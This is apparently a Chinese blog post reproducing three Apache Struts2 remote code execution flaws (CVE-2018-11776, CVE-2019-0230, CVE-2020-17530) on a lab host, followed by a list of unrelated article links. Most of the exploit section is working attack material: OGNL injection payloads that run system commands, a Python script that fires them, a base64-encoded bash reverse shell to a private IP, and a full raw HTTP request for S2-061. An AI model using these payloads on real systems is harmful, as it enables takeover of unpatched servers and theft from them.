Struts2遠程代碼執(zhí)行漏洞復現編碼

0x00 Struts2 簡介

Struts2 是 Apache 軟件組織推出的一個相當強大的 Java Web 開源框架，本質上相當于一個 servlet。Struts2 基于 MVC 架構，框架結構清晰。通常作為控制器（Controller）來建立模型與視圖的數據交互，用于創(chuàng)建企業(yè)級 Java web 應用程序。該框架多版本存在遠程代碼執(zhí)行，

0x01 Struts2 (CVE-2018-11776)

Struts2 S2-057

payload：/struts2-showcase/$%7B233*233%7D/actionChain1.action

驗證漏洞存在：

paylaod：ls：查看目錄下文件，paylaod需要進行url編碼
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

0x02 Struts2 (CVE-2019-0230)

Struts2 S2-059

漏洞驗證paylaod：/?id=%25{2*5}

反彈shell：paylaod：使用python3環(huán)境，運行前查看環(huán)境執(zhí)行是否正常

反彈paylaod：bash -i >& /dev/tcp/192.168.222.134/6666 0>&1
需要base64加密放入下paylaod
import requests
url = "http://192.168.222.134:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
print(123)

?執(zhí)行腳本

shell接收成功：

0x03 Struts2 (CVE-2020-17530)

Struts2 S2-061

POC：post請求：
POST / HTTP/1.1
Host: 192.168.222.134:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0
If-None-Match: W/"187-1504645830000"
If-Modified-Since: Tue, 05 Sep 2017 2130 GMT
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Connection: close
Content-Length: 829


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

0x04 strust2 命令執(zhí)行檢測工具

github：https://github.com/HatBoy/Struts2-Scan
現支持部分序號的st2檢測：s2-053之前，測試過程還是出現了很多問題，實戰(zhàn)中建議使用單獨的對應exp檢測

編輯：黃飛

閱讀全文

控制器(191060) 控制器(191060)
JAVA(115965) JAVA(115965)

小米路由器任意文件讀取及遠程命令執(zhí)行漏洞解析

存在任意文件讀取漏洞和遠程命令執(zhí)行漏洞，攻擊者通過該漏洞可以獲取服務器權限，導致服務器失陷。二、漏洞復現系統(tǒng)首頁地址及頁面顯示如下 ? ?http://xx.xx.xx.xx/cgi-bin

2023-03-01 15:09:17

5107

Struts框架技術在J2EE中的研究和應用

Struts框架技術在J2EE中的研究和應用J2EE簡介J2EE是一個開放的、基于標準的平臺，可以開發(fā)、部署和管理N層結構的、面向Web的、以服務器為中心的企業(yè)級應用，它是利用Java 2 平臺來

2009-11-13 22:07:17

遠程執(zhí)行后臺程序問題

大佬們，我linux ssh遠程后臺執(zhí)行一個jar 退出終端程序就掉了，使用的命令是nohup java路徑 -jar jar程序 &退出終端后仍然程序掛掉。使用nohup java路徑

2020-11-11 15:59:59

DM368 MP3編碼及程序遠程升級問題

MP3編碼器好?? ??????? 還有一個問題:請問專家,appro 的 SDK有沒有遠程升級內核/文件系統(tǒng)的功能? ?????? 謝謝 [td][td][/tr][tr]

2018-05-31 04:55:55

M031如何執(zhí)行USB設備遠程喚醒功能

應用程序: 演示如何執(zhí)行 USB 設備遠程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-30 08:51:17

[下載]Struts2+Hibernate3整合項目視頻下載（不定期更新）

關系。 整體視頻大綱： 視頻是完全真實課堂錄制，視頻主要內容包括：1：Struts2和Hibernate3在實際項目開發(fā)中的使用2：自定義泛型、反射、注解、枚舉等技術在

2010-04-26 10:13:20

[下載]Struts2+Hibernate3整合項目視頻（新版的增刪改查）

Struts2+Hibernate3整合項目視頻（新版的增刪改查） 1、應用通用的DAO 2、真實值/表現值的轉換  在

2010-03-17 14:53:41

[轉帖]學JAVA需要掌握的技術及流程

分頁、Web樹、Javascript在Web開發(fā)中的應用、常見的一些Web控件等等。 14.Struts2框架  完整的學習Struts2框架

2010-05-14 13:19:24

codewarrior代碼不執(zhí)行

mc9s08dz60芯片，使用codewarrior編寫代碼時，使用了TMP1和TMP2兩個定時器，如果使TMP1一直執(zhí)行，TMP2中有部分代碼不執(zhí)行。如果不初始化TMP1，TMP2中所有代碼可以正常執(zhí)行。

2015-07-17 16:59:26

分析嵌入式軟件代碼的漏洞-代碼注入

進行編譯在大多數情況下，程序故意像執(zhí)行代碼一樣執(zhí)行數據是不尋常的，但將數據用于構造有意執(zhí)行的對象卻很常見。 1、格式化字符串漏洞大多數C程序員熟悉printf函數。大體上，這些格式字符串

2025-12-22 12:53:41

北大青鳥的struts課件下載

北大青鳥的struts課件下載北大青鳥的structs課件內容有掌握Struts的控制器組件掌握Struts的視圖標簽運用Struts的Validator框架理解Struts的MVC原理理解JSF

2008-12-08 11:13:54

國產智能掃地機器人被曝存在安全漏洞，易隱私泄露

　　導讀：安全研究人員發(fā)現智能機器人存在兩個安全漏洞，導致其容易受到攻擊。第一個漏洞可以讓黑客對設備擁有超級用戶權限，可以遠程控制它們在家里運動，這有點令人毛骨悚然。第二個漏洞允許黑客查看攝像機拍攝

2018-07-27 09:29:19

基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描

本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描對Linux系統(tǒng)開發(fā)有5年了，近期在blackberry2上移植把玩

2017-04-29 09:59:05

如何執(zhí)行USB設備遠程喚醒功能

應用程序: 演示如何執(zhí)行 USB 設備遠程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-23 07:13:40

嵌入式代碼可能存在的致命漏洞是什么

關注+星標公眾號，不錯過精彩內容來源 |電子伊甸園微信公眾號|嵌入式專欄隨著互聯(lián)網的發(fā)展，嵌入式設備正分布在一個充滿可以被攻擊者利用的源代碼級安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)...

2021-12-17 07:59:40

影響 Linux 系統(tǒng)安全基石的 glibc 嚴重漏洞

編者按：這個消息是幾個月前曝出的，也許我們該對基礎軟件的安全問題更加重視。谷歌披露的一個嚴重漏洞影響到了主流的 Linux 發(fā)行版。glibc 的漏洞可能導致遠程代碼執(zhí)行。幾個月前，Linux 用戶

2016-06-25 10:01:50

源代碼審計怎么做？有哪些常用工具

地匹配、查找。 2、Checkmax：通過虛擬編譯器自動對軟件源代碼分析，并建立了代碼元素及代碼元素之間關系的邏輯圖。然后對這個內部代碼圖進行查詢，包含已知安全漏洞和質量缺陷問題預先設定好的查詢列表

2024-01-17 09:35:47

用于緩解高速緩存推測漏洞的固件接口

CVE-2017-5715，也稱為Spectre Variant 2，是某些ARM CPU設計中的漏洞，允許攻擊者控制受害者執(zhí)行上下文中的推測執(zhí)行流，并泄露攻擊者在體系結構上無法訪問的數據。在

2023-08-25 07:36:27

請問遠程執(zhí)行IC驗證是怎么實現的？

請問遠程執(zhí)行IC驗證是怎么實現的？

2021-06-17 10:27:33

請問如何在STMIDE中執(zhí)行編碼標準？

有沒有辦法通過一些文本突出顯示在 STMIDE 中強制執(zhí)行編碼標準？即：“函數名稱應為 Function_Name()”等。在這種情況下，STM 對其生成的庫使用什么規(guī)則？有人為此推薦一些插件嗎？其他人在編寫代碼時試圖遵循哪些標準？

2023-01-12 06:53:25

深入淺出Struts 2 (中文PDF版)

深入淺出Struts 2Struts2 是Struts的下一代產品。而最初提案Struts Ti所設想的發(fā)展方向，在Struts的現有代碼的基礎上是很難完成的。在發(fā)起提案的時候，Patrick Lightbody把多個不同的Web框

2008-10-29 14:17:37

Struts快速學習指南-pdf

Struts快速學習指南:Struts 是一個技術框架，由Craig R. McClanahan編寫，并且在2000 年的時候捐獻給了ASF，目前，有很多組織和個人參與Struts 框架的開發(fā)，使得Struts保持高速成長，同時

2008-12-08 10:32:50

北大青鳥struts課件下載

北大青鳥struts課件:理解JSF的體系結構,掌握JSF應用程序的開發(fā)步驟,掌握JSF應用的導航規(guī)則,熟練掌握JSF應用的標簽庫,掌握Struts的控制器組件,掌握Struts的視圖標簽,運用Struts的Validator

2008-12-08 10:59:04

Struts技術簡介

Struts 框架是最重要的組件，它通過使用Servlet org.apache.struts.action.ActionServlet 來實現struts-config.xml的配置信息，把請求轉發(fā)給適當的Action對象不存在，ActionServlet會先創(chuàng)建這個對象Actio

2008-12-08 11:01:10

Struts控制器組件

Web 應用程序是許多單獨組件的集合Struts 實現了模型-視圖-控制器Struts框架實現的只是MVC的視圖和控制器組件Struts 的備選框架JSF、Springstruts-config.xml 文件告訴 ActionServlet

2008-12-08 11:02:15

Struts視圖組件

Struts視圖組件控制器是應用程序中的訪問中心點ActionServlet 從 Struts 配置文件中讀取數據并初始化 Struts 應用程序的配置RequestProcessor 類處理請求的所有特性，所有請求都是在

2008-12-08 11:03:07

基于Struts框架和Procedure的Web開發(fā)模式

介紹基于MVC設計模式的Struts框架的組成和實現原理，總結該開發(fā)框架的應用特點和開發(fā)步驟。在分析和比較其他基于Struts開發(fā)模式特點的基礎上，提出基于Struts和存儲過程結合的Web

2009-04-23 10:16:20

漢明糾錯編碼器實例（VHDL源代碼）

漢明糾錯嗎編碼器實例（VHDL源代碼）:

2009-05-27 10:11:15

基于Struts2企業(yè)級異常處理研究及擴展

傳統(tǒng)的Java異常-捕獲機制已不能滿足當今大型企業(yè)級開發(fā)的要求。本文對Struts2提供的異常處理機制進行了研究和擴展，提出將檢查型（Checked）異常轉化為非檢查型（Unchecked）異常

2009-06-18 08:19:24

基于Struts框架構建績效考核管理系統(tǒng)

績效考核管理系統(tǒng)是企業(yè)對員工績效進行量化考核的手段。首先分析了構建系統(tǒng)的目的，然后對基于MVC設計模式的struts框架進行了介紹，通過舉例具體闡明了在采用struts框架進行開

2009-08-12 10:00:41

基于Struts和Hibernate的Web應用的構建

本文介紹了 MVC 模式與兩個開源框架：Struts 和Hibernate，提出了基于這兩種框架的Web 應用的模型，并就Struts 和Hibernate 在模型中的工作流程給出了較為詳細的闡述，最后對模型的

2009-08-29 10:30:03

Struts及其在糧食倉儲系統(tǒng)中的應用

文中介紹了一種利用Struts 結構化應用程序的方法，并結合項目中的實際應用，談了些作者的心得體會。關鍵詞：J2EE；MVC；Struts；JSP；Servlet

2009-09-09 08:10:09

基于Hibernate與Struts框架的物流管理系統(tǒng)的實現

基于使用單一框架構建企業(yè)級應用時存在拓展性差，結構復雜的問題，給出使用Struts 結合Hibernate 開源框架進行整合開發(fā)的實例，同時探討如何配置和靈活應用Struts和Hibernate 框架

2009-09-12 16:22:02

基于Struts和Hibernate框架的Web應用的設計與

基于J2EE 平臺的框架技術是目前開發(fā)Web 應用的主流技術。其中，Struts 框架基于MVC 設計模式，清晰地劃分了控制部分、業(yè)務邏輯和視圖，實現了各層之間的解耦；而Hibernate 對JDBC 提供

2009-09-14 16:21:31

EZW編碼器源代碼

2010-02-09 15:21:03

Struts編程源代碼

Struts編程源代碼部分代碼如下: %@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %><%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>&l

2010-03-31 14:32:08

Struts2 極速表單驗證框架使用說明書

1 Struts2 極速表單驗證框架使用說明書.12 Struts 2 極速表單驗證框架簡介.23 項目許可.34 下載本項目.35 演示應用.46 整合步驟step by step 87 驗證規(guī)則表達式詳解.128 和R

2010-09-18 08:27:05

struts實現多圖片上傳

package　com.ninetowns.zhangc.struts.action;public　class　Constant　{ 　 private　Constant

2010-12-27 17:28:44

基于Struts框架的科技管理系統(tǒng)的設計

在總結傳統(tǒng)B/S架構的科技管理系統(tǒng)存在的許多弊端的基礎上，探討Struts框架的體系結構及實現MVC設計模式的機制，詳細分析科技管理系統(tǒng)的主要功能，并利用Struts框架和Java語言對該

2010-12-29 17:30:29

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：09SSH整合-版本1-搭建struts2的開發(fā)環(huán)境并測試

springStruts系統(tǒng)架構

Mr_haohao發(fā)布于 2022-10-03 13:48:33

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：13SSH整合-版本1-拷貝struts2整合spring的

springStruts系統(tǒng)架構

Mr_haohao發(fā)布于 2022-10-03 13:51:45

Struts中文手冊下載

經過了兩個星期不懈努力，今天終于完成了對strtus整體架構及核心標簽庫的介紹。從幾乎不懂struts和HTML標簽，到可以給別人解決涉及struts的一些小問題，這與朋友的幫助和我的努力是分不開的，但我更希望它能給那些想要學的，正在學的和已經學過的人帶來不同

2011-02-28 14:39:51

MPEG-2壓縮編碼器原理

MPEG - 2 壓縮編碼器是將模擬電視視音頻信號進行MPEG - 2壓縮編碼輸出實時TS流的前端設備,適用于數字電視的傳輸或前端信源編碼以及會議電視、遠程教育等各種應用

2011-03-15 11:03:42

5435

Struts In Action使用領先的Java框架構建Web應用

歡迎你閱讀《Struts In Action》。本書的目的是幫助Web應用開發(fā)者能夠最好的使用Struts web應用框架。 Struts是一個開源軟件，有助于開發(fā)者更加快速和容易地建立 Web 應用程序。Struts依靠絕

2011-04-14 20:17:50

Struts2和Ibatis在畢業(yè)答辯管理系統(tǒng)中的應用

在深入分析Struts2和Ibatis基礎上,構建了兩框架的整合方案。文中以畢業(yè)答辯管理系統(tǒng)設計與實現為例,介紹其在實際開發(fā)過程中的應用。

2011-10-17 16:41:47

Struts2 V3.0入門

Struts 2是Struts的下一代產品，是在 struts 和WebWork的技術基礎上進行了合并的全新的Struts 2框架。其全新的Struts 2的體系結構與Struts 1的體系結構的差別巨大。Struts 2以WebWork為核心，采用攔

2011-12-06 10:46:29

J2EE基于Struts和Hibernate框架的新聞發(fā)布系統(tǒng)分析

以J2EE為基礎，對Struts和Hibernate框架分別進行深入剖析，研究分析二者的整合集成技術，并對開發(fā)所使用的MVC設計模式和MySQL數據庫簡要介紹。通過引入新聞系統(tǒng)實例討論了Struts框架對系

2012-08-29 14:51:35

Struts2源代碼分析

Struts2源代碼分析。

2015-11-06 10:06:50

FPGA卷積編碼1/2碼率

這是verilog寫的可以實現卷積編碼1/2碼率的代碼，附帶測試文件0

2016-01-20 18:23:39

遠程桌面軟件代碼—lookmypc遠程桌面軟件代碼

遠程桌面軟件代碼—lookmypc遠程桌面軟件代碼，主要提供給程序員進行二次開發(fā)使用，因此只提供了基本的演示功能，不能實現自啟動，連接時需要人工點擊確認，不能實現隱蔽監(jiān)控等，程序員可以根據提供的代碼和接口，實現更多，更復雜的功能。

2016-05-11 11:30:19

h264編碼解碼源代碼

h264編碼解碼源代碼h264編碼解碼源代碼

2017-01-14 15:50:23

結合靜態(tài)分析與動態(tài)符號執(zhí)行的軟件漏洞檢測方法

動態(tài)符號執(zhí)行是近年來新興的一種軟件漏洞檢測方法，它可以為目標程序的不同執(zhí)行路徑自動生成測試用例，從而獲得較高的測試代碼覆蓋率。然而，程序的執(zhí)行路徑很多，且大部分路徑都是漏洞無關的，通常那些包含危險

2017-11-23 15:01:36

蘋果最新 MacOS 安全更新包中含有針對 USB 代碼執(zhí)行漏洞的補丁

蘋果公司最新的 MacOS 安全更新包中包含了針對 USB 代碼執(zhí)行漏洞的補丁。這個漏洞存在于 fsck_msods 工具之中。fsck_msods是一個系統(tǒng)工具，它可以用來檢測并修復 FAT

2017-11-27 06:34:37

555

基于符號執(zhí)行技術實現的驅動程序的漏洞檢測

研究表明，驅動程序的漏洞是造成Linux系統(tǒng)安全問題的主要原因之一，可引發(fā)提權、拒絕服務等高危情況。針對無具體設備的情況下，無法對驅動程序進行運行時漏洞檢測的問題，提出了對驅動程序進行符號化執(zhí)行

2017-12-05 16:06:01

基于動態(tài)污點分析的DOM XSS漏洞檢測算法

腳本引擎，利用動態(tài)的、基于bytecode的污點分析方法實現了DOM XSS漏洞的檢測。對DOM對象類屬性的擴展和SpiderMonkey字符串編碼格式的修改可以完成污點數據標記；遍歷

2017-12-18 16:01:44

精準執(zhí)行可達性分析

可達性分析在定向測試、靜態(tài)分析結果核驗、錯誤復現和漏洞POC構造等領域均有廣泛應用．本文對近年來國內外學者在該研究領域取得的相關研究成果進行了系統(tǒng)的分析、提煉和總結．首先，指出了精準執(zhí)行可達性分析對應的約束求

2017-12-19 15:42:16

ssi框架快速搭建

ssi的框架主要是由struts2，spring以及ibatis組成，他們負責各層之間的交互與協(xié)作，從而實現整個web端的功能實現與整合。Struts目前主要負責數據傳遞和控制方面，spring則依靠其強大的依賴注入技術實現了類似bean托管和整合等功能

2017-12-27 13:50:57

4229

AMD回應Spectre漏洞更新：將提供微代碼更新盡快修復舊平臺變磚問題

Spectre漏洞是近段時間大家比較關注的問題，據悉，AMD就舊平臺變磚問題問題將會在本周提供Spectre漏洞的微代碼更新。AMD表示已經分發(fā)給左右主板廠商。

2018-01-12 15:25:07

1173

360發(fā)現區(qū)塊鏈平臺EOS的一系列高危安全漏洞，安全問題不容忽視

360安全衛(wèi)士于2018年5月29日下午在微博上發(fā)布公告稱，360Vulcan（伏爾甘）團隊發(fā)現了區(qū)塊鏈平臺EOS的一系列高危安全漏洞。經驗證，其中部分漏洞可以在EOS節(jié)點上遠程執(zhí)行任意代碼，即可以通過遠程攻擊，直接控制和接管EOS上運行的所有節(jié)點。

2018-07-03 10:50:00

1476

微軟Windows Defender出現漏洞攻擊者可利用漏洞對計算機進行控制

最近安全人員發(fā)現了一個Windows Defender漏洞，這個漏洞是一個遠程代碼執(zhí)行漏洞，通過追溯微軟自己使用的開源歸檔工具發(fā)現的。攻擊者可以利用這個漏洞在計算機上執(zhí)行遠程代碼操作，甚至可以自己執(zhí)行下載文件的操作。

2018-06-07 01:27:00

1314

施耐德電氣軟件存在遠程代碼執(zhí)行漏洞

這兩款軟件可以幫助人們對機器進行編程并確保關鍵基礎設施的順利運作，它們分別是：工具集 InduSoft Web Studio——旨在開發(fā)人機接口 (HMI)、監(jiān)視控制和數據采集 (SCADA) 系統(tǒng)以及嵌入式工具解決方案。InTouch Machine Edition——HMI/SCADA 開發(fā)工具，可用于高階應用以及小型嵌入式設備。

2018-05-09 11:45:37

5818

360發(fā)現區(qū)塊鏈EOS安全漏洞其足以轟癱數字體系

近日，360公司Vulcan（伏爾甘）團隊發(fā)現了區(qū)塊鏈平臺EOS的一系列高危安全漏洞。經驗證，其中部分漏洞可以在EOS節(jié)點上遠程執(zhí)行任意代碼，即可以通過遠程攻擊，直接控制和接管EOS上運行的所有節(jié)點。

2018-06-07 07:35:00

903

瑞士工業(yè)技術公司ABB的門禁通信系統(tǒng)中存在多個嚴重漏洞

研究人員發(fā)現的其中一個漏洞為遠程代碼注入漏洞，允許訪問本地網絡的攻擊者控制目標設備。該漏洞影響本地配置 Web 服務器，攻擊者可向系統(tǒng)發(fā)送特制的信息利用該漏洞。

2018-06-14 11:55:57

5644

Oracle發(fā)布季度補丁更新修復遠程代碼執(zhí)行漏洞

2018年7月18日，美國甲骨文（Oracle）公司官方發(fā)布了季度補丁更新，其中修復了一個 Oracle WebLogic Server 遠程代碼執(zhí)行漏洞 CVE-2018-2893，此漏洞是對編號為 CVE-2018-2628 修復的繞過，攻擊者同樣可以在未身份驗證的情況下對 WebLogic 進行攻擊。

2018-07-27 15:45:07

3452

博思艾倫獲10億美元合同，成美國政府最大網絡安全提供商

2018年8月22日，Struts2 官方公布最新的 Struts2 遠程代碼執(zhí)行漏洞 S2-057，CVE-2018-11776，當在 struts2 開發(fā)框架中使用泛 namespace 功能的時候，并且使用特定的 result 可能產生遠程代碼執(zhí)行漏洞。存在高危風險。

2018-08-24 14:34:12

5809

遠程代碼執(zhí)行漏洞現身運行內嵌式系統(tǒng)的流行操作系統(tǒng)

在主要用于智能家居及關鍵基礎設施系統(tǒng)中的大部分微處理器與單片機的開源操作系統(tǒng)FreeRTOS中，已發(fā)現13個漏洞，其中三分之一可用來執(zhí)行遠程代碼。

2018-10-28 09:30:45

4080

CVE漏洞—PHPCMS2008 /type.php代碼注入高危漏洞預警

webshell指令，在服務器上執(zhí)行任意代碼，因此該代碼注入漏洞的影響較大。安全建議手動修復臨時解決可以在/type.php文件中對template變量進行過濾，避免用戶輸入的含有"("、"{"等符號的內容混入

2018-12-07 16:18:53

599

Adobe發(fā)布安全更新，修復了Adobe Acrobat與Reader中多個關鍵安全漏洞

據悉，在這87個漏洞中，共有39個高危漏洞，這將允許攻擊者在受感染計算機上執(zhí)行代碼或提升權限。代碼執(zhí)行漏洞可允許攻擊者在受感染計算機上執(zhí)行命令，而特權提升漏洞可允許攻擊者以更高的權限等級執(zhí)行命令

2018-12-14 14:25:32

3235

ThinkPHP5.0.遠程代碼執(zhí)行漏洞預警

Thinkphp5.0.*存在遠程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實現任意代碼執(zhí)行等高危操作。

2019-01-26 16:26:00

3966

maccms網站受到網絡攻擊源于SQL注入遠程代碼漏洞

目前蘋果CMS官方在不斷的升級補丁，官方最新的漏洞補丁對于目前爆發(fā)的新漏洞沒有任何效果。

2020-01-14 15:30:15

1034

RCE漏洞具有17年歷史，影響了數個Linux系統(tǒng)

一個影響點對點協(xié)議守護程序（Point-to-Point Protocol daemon，pppd）軟件，并具有 17 年歷史的遠程代碼執(zhí)行（remote code execution，RCE）漏洞已對幾個基于 Linux 的操作系統(tǒng)造成了影響。

2020-03-10 14:32:23

2162

施耐德定級硬編碼漏洞為“嚴重”，已發(fā)布修復建議

近日，施耐德電氣最新發(fā)布的安全公告中，公開致謝頂象洞見安全實驗室發(fā)現并協(xié)助成功修復硬編碼漏洞（CVE-2020-7498）。公告中施耐德電氣將該漏洞定級為“嚴重”，攻擊者利用該漏洞，可對PLC設備進行重啟、植入惡意軟件，甚至損壞設備。

2020-06-16 10:01:09

4153

黑客利用遠程代碼執(zhí)行漏洞，超過30萬個網站易受到攻擊

黑客正積極利用一個關鍵的遠程代碼執(zhí)行漏洞，允許未經驗證的攻擊者在運行易受攻擊的File Manager插件版本的WordPress站點上載腳本并執(zhí)行任意代碼。

2020-09-03 16:20:47

2214

關于嵌入式代碼的致命漏洞

隨著互聯(lián)網的發(fā)展，嵌入式設備正分布在一個充滿可以被攻擊者利用的源代碼級安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)人員應該了解不同類型的安全漏洞——特別是代碼注入。術語“代碼注入”意味著對程序的常規(guī)數據

2021-01-06 15:13:13

2268

嵌入式代碼的致命安全漏洞

2021-01-15 15:07:55

2721

思科升級遠程命令執(zhí)行等高危漏洞

1月19日，思科發(fā)布了安全公告，旗下小型企業(yè)RV110W，RV130，RV130W和RV215W路由器中發(fā)現了遠程命令執(zhí)行等高危漏洞，建議盡快升級。以下是漏洞詳情：

2021-01-20 15:40:49

2140

基于神經網絡和代碼相似度的漏洞檢測

靜態(tài)漏洞檢測通常只針對文本進行檢測，執(zhí)行效率高但是易產生誤報。針對該問題，結合神經網絡技術提出一種基于代碼相似性的漏洞檢測方法。通過對程序源代碼進行敏感函數定位、程序切片和變量替換等數據預處理操作

2021-05-24 15:13:52

模型調優(yōu)和復現算法遇到的一些坑

的數據增強方式與代碼的實現不一樣等。（這些可能發(fā)生在開源復現者沒有“一比一”復現論文的情況，也可能發(fā)生在論文作者自己沒有實現的情況）

2022-05-18 15:03:29

1811

分解漏洞掃描，什么是漏洞掃描？

5W2H?分解漏洞掃描 - WHAT WHAT?什么是漏洞掃描？首先什么是漏洞？國內外各種規(guī)范和標準中關于漏洞（也稱脆弱性，英文對應Vulnerability）的定義很多，摘錄如下：互聯(lián)網工程

2022-10-12 16:38:17

1886

Arduino Nano 33 IoT遠程調試及編碼

電子發(fā)燒友網站提供《Arduino Nano 33 IoT遠程調試及編碼.zip》資料免費下載

2022-10-26 10:57:18

遠程伺服執(zhí)行器開源分享

電子發(fā)燒友網站提供《遠程伺服執(zhí)行器開源分享.zip》資料免費下載

2023-02-03 09:39:18

如何復現Log4j2漏洞

ApacheLog4j2是一個開源的Java日志框架，被廣泛地應用在中間件、開發(fā)框架與Web應用中。

2023-02-13 10:55:44

2072

車聯(lián)網開源組件BusyBox漏洞分析及復現

近日，國內多家安全實驗室檢測到了針對于智能網聯(lián)汽車中使用都開源項目busybox漏洞，國外在2022年5月份報告了此漏洞

2023-02-21 17:49:56

3710

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

大概是在上半年提交了某個CMS的命令執(zhí)行漏洞，現在過了那么久，也想通過這次挖掘通用型漏洞，整理一下挖掘思路，分享給大家。

2023-05-18 17:18:58

4410

使Struts2應用程序更安全：不要包含配置瀏覽器

Struts2 插件包含擴展、替換或添加到現有 Struts 框架功能的類和配置。除了 JAR 文件之外，還可以通過將其 JAR 文件添加到應用程序的類路徑來安裝插件，以滿足插件本身可能具有的任何

2023-05-25 15:08:57

838

虹科分享|如何防范MOVEit傳輸漏洞|高級威脅防御

警報和網絡安全公告，CL0P勒索軟件團伙一直在積極利用漏洞進行數據外泄，并在目標計算機上執(zhí)行遠程命令。我們對MOVEit傳輸漏洞的了解Progresssecurit

2023-06-29 10:08:20

1527

Python中的默認編碼

####1. Python源代碼文件的執(zhí)行過程我們都知道，磁盤上的文件都是以二進制格式存放的，其中文本文件都是以某種特定編碼的字節(jié)形式存放的。對于程序源代碼文件的字符編碼是由編輯器指定的，比如

2023-07-05 16:11:02

1807

PT2264遠程控制編碼器C手冊

PT2264是一個遠程控制編碼器與PT2294利用CMOS技術配對.數據編碼地址pins適合RF調制成串行編碼波形.PT2264有一個最大三狀態(tài)地址12的bits pins提供到531,441（或3減少任何代碼沖突和未經授權的代碼掃描的可能性。

2023-08-21 09:18:13

靜態(tài)代碼塊、構造代碼塊、構造函數及普通代碼塊的執(zhí)行順序

在Java中，靜態(tài)代碼塊、構造代碼塊、構造函數、普通代碼塊的執(zhí)行順序是一個筆試的考點，通過這篇文章希望大家能徹底了解它們之間的執(zhí)行順序。 1、靜態(tài)代碼塊 ①、格式在java類中（方法中不能存在靜態(tài)

2023-10-09 15:40:56

2338

蘋果修復macOS Ventura和Sonoma內存漏洞

蘋果強調，該漏洞可影響macOS Ventura及macOS Sonoma系統(tǒng)，攻擊者可借此生成惡意文件。用戶一旦點擊瀏覽，可能引發(fā)應用程序異常關閉甚至造成任意代碼執(zhí)行風險。

2024-03-14 11:43:46

1228

Rust漏洞可遠程執(zhí)行惡意指令，已發(fā)布安全補丁

此漏洞源于操作系統(tǒng)命令及參數注入缺陷，攻擊者能非法執(zhí)行可能有害的指令。CVSS評分達10/10，意味著無須認證即可借助該漏洞發(fā)起低難度遠端攻擊。

2024-04-10 14:24:20

1348

微軟去年提交1128個漏洞，"提權"和"遠程代碼執(zhí)行"最為常見

據BeyondTrust安全平臺統(tǒng)計顯示，微軟于2023年共報告漏洞1128項，相較于2022年的1292個略微下滑5%，但總漏洞數仍維持在歷史高位。值得注意的是，NIST通用漏洞評級系統(tǒng)中評分9.0以上的嚴重漏洞數量已明顯減少

2024-04-29 16:11:29

997

Adobe修復35項安全漏洞，主要涉及Acrobat和FrameMaker

值得關注的是，Adobe對Acrobat及Acrobat Reader軟件的漏洞修復最為重視，共修復了12個漏洞，其中9個為“遠程執(zhí)行代碼”嚴重漏洞，主要由RAM的“Use After Free”類型漏洞引發(fā)。

2024-05-16 15:12:41

1401

C2000 DCSM ROM代碼片段/ROP漏洞

電子發(fā)燒友網站提供《C2000 DCSM ROM代碼片段/ROP漏洞.pdf》資料免費下載

2024-08-28 09:39:01

微軟Outlook曝高危安全漏洞

